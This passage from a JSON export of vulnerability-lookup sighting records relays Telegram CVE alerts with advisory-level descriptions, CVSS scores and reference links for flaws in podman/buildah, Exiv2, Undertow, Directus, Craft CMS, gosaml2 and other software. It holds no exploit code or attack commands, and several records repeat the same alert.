mentioned formats. This is authentication-required vulnerability allowing arbitrary file reads from the server filesystem. It may lead to potential exposure of sensitive information like configuration files, credentials, and confidential data. Label Studio versions before 1.16.0 specified SDK versions prior to 1.0.10 as dependencies, and the issue was confirmed in Label Studio version 1.13.2.dev0; therefore, Label Studio users should upgrade to 1.16.0 or newer to mitigate it.\n\ud83d\udccf Published: 2025-02-14T16:50:26.336Z\n\ud83d\udccf Modified: 2025-02-26T19:09:59.018Z\n\ud83d\udd17 References:\n1. https://github.com/HumanSignal/label-studio/security/advisories/GHSA-rgv9-w7jp-m23g\n2. https://github.com/HumanSignal/label-studio-sdk/commit/4a9715c6b0b619371e89c09ea8d1c86ce5c880df", "creation_timestamp": "2025-02-26T19:24:06.000000Z"}, {"uuid": "7797b9c6-5753-4966-a452-fd528206c7bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1207", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5635", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-02-27T00:54:39.333Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/security/cve/CVE-2024-11218\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-02-27T01:26:02.000000Z"}, {"uuid": "365b2a3d-1bbe-428c-9c3e-5cdcbd1d61fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HRW9-GGG3-3R4R", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5613", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-44398\n\ud83d\udd25 CVSS Score: 8.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Exiv2 is a C++ library and a command-line utility to read, write, delete and modify Exif, IPTC, XMP and ICC image metadata. An out-of-bounds write was found in Exiv2 version v0.28.0. The vulnerable function, `BmffImage::brotliUncompress`, is new in v0.28.0, so earlier versions of Exiv2 are _not_ affected. The out-of-bounds write is triggered when Exiv2 is used to read the metadata of a crafted image file. An attacker could potentially exploit the vulnerability to gain code execution, if they can trick the victim into running Exiv2 on a crafted image file. This bug is fixed in version v0.28.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2023-11-06T17:30:54.394Z\n\ud83d\udccf Modified: 2025-02-26T21:15:17.204Z\n\ud83d\udd17 References:\n1. https://github.com/Exiv2/exiv2/security/advisories/GHSA-hrw9-ggg3-3r4r\n2. https://github.com/Exiv2/exiv2/commit/e884a0955359107f4031c74a07406df7e99929a5\n3. https://security.gentoo.org/glsa/202312-06", "creation_timestamp": "2025-02-26T21:25:26.000000Z"}, {"uuid": "0c651188-66bb-43d6-90c5-d6430ae82bc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1862", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5664", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-02-27T10:40:09.662Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/security/cve/CVE-2024-1635\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-02-27T11:25:30.000000Z"}, {"uuid": "da7e0b60-80a1-4e83-9e99-abccff28e7c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9459", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5724", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9676\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Podman, Buildah, and CRI-O. A symlink traversal vulnerability in the containers/storage library can cause Podman, Buildah, and CRI-O to hang and result in a denial of service via OOM kill when running a malicious image using an automatically assigned user namespace (`--userns=auto` in Podman and Buildah). The containers/storage library will read /etc/passwd inside the container, but does not properly validate if that file is a symlink, which can be used to cause the library to read an arbitrary file on the host.\n\ud83d\udccf Published: 2024-10-15T15:27:33.665Z\n\ud83d\udccf Modified: 2025-02-27T16:57:02.474Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10289\n2. https://access.redhat.com/errata/RHSA-2024:8418\n3. https://access.redhat.com/errata/RHSA-2024:8428\n4. https://access.redhat.com/errata/RHSA-2024:8437\n5. https://access.redhat.com/errata/RHSA-2024:8686\n6. https://access.redhat.com/errata/RHSA-2024:8690\n7. https://access.redhat.com/errata/RHSA-2024:8694\n8. https://access.redhat.com/errata/RHSA-2024:8700\n9. https://access.redhat.com/errata/RHSA-2024:8984\n10. https://access.redhat.com/errata/RHSA-2024:9051\n11. https://access.redhat.com/errata/RHSA-2024:9454\n12. https://access.redhat.com/errata/RHSA-2024:9459\n13. https://access.redhat.com/errata/RHSA-2024:9926\n14. https://access.redhat.com/errata/RHSA-2025:0876\n15. https://access.redhat.com/security/cve/CVE-2024-9676\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2317467\n17. https://github.com/advisories/GHSA-wq2p-5pc6-wpgf", "creation_timestamp": "2025-02-27T17:25:18.000000Z"}, {"uuid": "6fce2607-8536-4d3b-871b-19a84a42272e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1372", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5635", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-02-27T00:54:39.333Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/security/cve/CVE-2024-11218\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-02-27T01:26:02.000000Z"}, {"uuid": "5ca092cf-f5f0-44a5-bb21-03b614c43ec4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WQ2P-5PC6-WPGF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5724", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9676\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Podman, Buildah, and CRI-O. A symlink traversal vulnerability in the containers/storage library can cause Podman, Buildah, and CRI-O to hang and result in a denial of service via OOM kill when running a malicious image using an automatically assigned user namespace (`--userns=auto` in Podman and Buildah). The containers/storage library will read /etc/passwd inside the container, but does not properly validate if that file is a symlink, which can be used to cause the library to read an arbitrary file on the host.\n\ud83d\udccf Published: 2024-10-15T15:27:33.665Z\n\ud83d\udccf Modified: 2025-02-27T16:57:02.474Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10289\n2. https://access.redhat.com/errata/RHSA-2024:8418\n3. https://access.redhat.com/errata/RHSA-2024:8428\n4. https://access.redhat.com/errata/RHSA-2024:8437\n5. https://access.redhat.com/errata/RHSA-2024:8686\n6. https://access.redhat.com/errata/RHSA-2024:8690\n7. https://access.redhat.com/errata/RHSA-2024:8694\n8. https://access.redhat.com/errata/RHSA-2024:8700\n9. https://access.redhat.com/errata/RHSA-2024:8984\n10. https://access.redhat.com/errata/RHSA-2024:9051\n11. https://access.redhat.com/errata/RHSA-2024:9454\n12. https://access.redhat.com/errata/RHSA-2024:9459\n13. https://access.redhat.com/errata/RHSA-2024:9926\n14. https://access.redhat.com/errata/RHSA-2025:0876\n15. https://access.redhat.com/security/cve/CVE-2024-9676\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2317467\n17. https://github.com/advisories/GHSA-wq2p-5pc6-wpgf", "creation_timestamp": "2025-02-27T17:25:18.000000Z"}, {"uuid": "2aa76ebc-8844-435d-849e-95e464ee4c4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1707", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5635", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-02-27T00:54:39.333Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/security/cve/CVE-2024-11218\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-02-27T01:26:02.000000Z"}, {"uuid": "011d76a2-513b-4e39-96a3-baac95d209e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1189", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5635", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-02-27T00:54:39.333Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/security/cve/CVE-2024-11218\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-02-27T01:26:02.000000Z"}, {"uuid": "2ef8b622-a1e9-4555-a2b3-0bd88ec38ede", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1275", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5635", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-02-27T00:54:39.333Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/security/cve/CVE-2024-11218\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-02-27T01:26:02.000000Z"}, {"uuid": "1b8e4019-a49b-4058-8715-2c6c3d79881f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1188", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5635", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-02-27T00:54:39.333Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/security/cve/CVE-2024-11218\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-02-27T01:26:02.000000Z"}, {"uuid": "f0d3de09-63f5-4c34-898b-031f50ba94ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1453", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5635", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-02-27T00:54:39.333Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/security/cve/CVE-2024-11218\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-02-27T01:26:02.000000Z"}, {"uuid": "2b2e873e-b9b7-41dc-b197-54aeaac12090", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1334", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5775", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11831\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in npm-serialize-javascript. The vulnerability occurs because the serialize-javascript module does not properly sanitize certain inputs, such as regex or other JavaScript object types, allowing an attacker to inject malicious code. This code could be executed when deserialized by a web browser, causing Cross-site scripting (XSS) attacks. This issue is critical in environments where serialized data is sent to web clients, potentially compromising the security of the website or web application using this package.\n\ud83d\udccf Published: 2025-02-10T15:27:46.732Z\n\ud83d\udccf Modified: 2025-02-27T20:12:57.720Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1334\n2. https://access.redhat.com/errata/RHSA-2025:1468\n3. https://access.redhat.com/security/cve/CVE-2024-11831\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2312579\n5. https://github.com/yahoo/serialize-javascript/commit/f27d65d3de42affe2aac14607066c293891cec4e\n6. https://github.com/yahoo/serialize-javascript/pull/173", "creation_timestamp": "2025-02-27T20:25:33.000000Z"}, {"uuid": "94f0beec-dfc5-4e34-898d-de086dd327c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C6MG-9537-C8CF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5370", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27139\n\ud83d\udd25 CVSS Score: 6.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N)\n\ud83d\udd39 Description: Combodo iTop is a web based IT service management tool. Versions prior to 2.7.12, 3.1.2, and 3.2.0 are vulnerable to cross-site scripting when the preferences page is opened. Versions 2.7.12, 3.1.2, and 3.2.0 fix the issue.\n\ud83d\udccf Published: 2025-02-25T19:52:15.589Z\n\ud83d\udccf Modified: 2025-02-25T20:07:39.635Z\n\ud83d\udd17 References:\n1. https://github.com/Combodo/iTop/security/advisories/GHSA-c6mg-9537-c8cf", "creation_timestamp": "2025-02-25T20:22:57.000000Z"}, {"uuid": "487ca13e-ce57-4ec0-a490-c1c2a3a14054", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J3RG-3RGM-537H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5302", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-26492\n\ud83d\udd25 CVSS Score: 5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)\n\ud83d\udd39 Description: Directus is a real-time API and App dashboard for managing SQL database content. Directus is vulnerable to Server-Side Request Forgery (SSRF) when importing a file from a remote web server (POST to `/files/import`). An attacker can bypass the security controls by performing a DNS rebinding attack and view sensitive data from internal servers or perform a local port scan. An attacker can exploit this vulnerability to access highly sensitive internal server(s) and steal sensitive information. This issue was fixed in version 9.23.0.\n\ud83d\udccf Published: 2023-03-03T21:49:02.314Z\n\ud83d\udccf Modified: 2025-02-25T15:02:38.689Z\n\ud83d\udd17 References:\n1. https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h\n2. https://github.com/directus/directus/commit/ff53d3e69a602d05342e15d9bb616884833ddbff\n3. https://github.com/directus/directus/releases/tag/v9.23.0", "creation_timestamp": "2025-02-25T15:23:24.000000Z"}, {"uuid": "a2621127-3583-444b-925b-d2b93a200e46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QCRJ-6FFC-V7HQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5303", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-23927\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: Craft is a platform for creating digital experiences. When you insert a payload inside a label name or instruction of an entry type, an cross-site scripting (XSS) happens in the quick post widget on the admin dashboard. This issue has been fixed in version 4.3.7.\n\n\ud83d\udccf Published: 2023-03-03T21:58:26.183Z\n\ud83d\udccf Modified: 2025-02-25T15:02:32.273Z\n\ud83d\udd17 References:\n1. https://github.com/craftcms/cms/security/advisories/GHSA-qcrj-6ffc-v7hq\n2. https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#437---2023-02-03\n3. https://user-images.githubusercontent.com/53917092/215604129-d5b75608-5a24-4eb3-906f-55b192310298.mp4", "creation_timestamp": "2025-02-25T15:23:25.000000Z"}, {"uuid": "add2c24d-a061-4e40-97ec-c753d64f0745", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6GC3-CRP7-25W5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5304", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-26483\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: gosaml2 is a Pure Go implementation of SAML 2.0. SAML Service Providers using this library for SAML authentication support are likely susceptible to Denial of Service attacks. A bug in this library enables attackers to craft a `deflate`-compressed request which will consume significantly more memory during processing than the size of the original request. This may eventually lead to memory exhaustion and the process being killed. The maximum compression ratio achievable with `deflate` is 1032:1, so by limiting the size of bodies passed to gosaml2, limiting the rate and concurrency of calls, and ensuring that lots of memory is available to the process it _may_ be possible to help Go's garbage collector \"keep up\". Implementors are encouraged not to rely on this. This issue is fixed  in version 0.9.0.\n\ud83d\udccf Published: 2023-03-03T22:02:44.757Z\n\ud83d\udccf Modified: 2025-02-25T15:02:24.668Z\n\ud83d\udd17 References:\n1. https://github.com/russellhaering/gosaml2/security/advisories/GHSA-6gc3-crp7-25w5\n2. https://github.com/russellhaering/gosaml2/commit/f9d66040241093e8702649baff50cc70d2c683c0\n3. 